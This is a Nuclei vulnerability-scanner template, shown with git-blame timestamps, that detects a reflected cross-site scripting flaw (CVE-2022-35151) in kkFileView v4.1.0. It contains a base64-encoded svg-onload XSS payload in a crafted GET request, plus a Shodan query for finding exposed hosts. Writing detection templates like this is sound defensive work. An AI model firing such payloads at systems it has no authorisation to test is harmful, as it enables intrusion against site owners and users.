nuclei-templates/cves/2022/CVE-2022-35151.yaml

40 lines
1.0 KiB
YAML
Raw Normal View History

2022-08-18 10:58:38 +00:00
id: CVE-2022-35151
info:
name: kkFileView v4.1.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
reference:
- https://github.com/kekingcn/kkFileView/issues/366
2022-08-19 07:04:35 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
2022-08-19 11:55:20 +00:00
classification:
cve-id: CVE-2022-35151
2022-08-18 10:58:38 +00:00
metadata:
2022-08-19 11:55:20 +00:00
verified: true
2022-08-19 07:04:35 +00:00
shodan-query: http.html:"kkFileView"
tags: cve,cve2022,xss,kkfileview
2022-08-18 10:58:38 +00:00
requests:
2022-08-19 09:06:28 +00:00
- raw:
- |
2022-08-19 11:55:20 +00:00
GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
2022-08-19 09:06:28 +00:00
Host: {{Hostname}}
2022-08-18 10:58:38 +00:00
matchers-condition: and
matchers:
- type: word
2022-08-19 07:04:35 +00:00
part: body
2022-08-18 10:58:38 +00:00
words:
2022-08-25 08:25:04 +00:00
- '"><svg/onload=alert(1)>"'
2022-08-19 07:04:35 +00:00
- type: word
part: header
2022-08-19 09:03:39 +00:00
words:
2022-08-19 11:55:20 +00:00
- text/html
2022-08-19 07:04:35 +00:00
- type: status
status:
- 200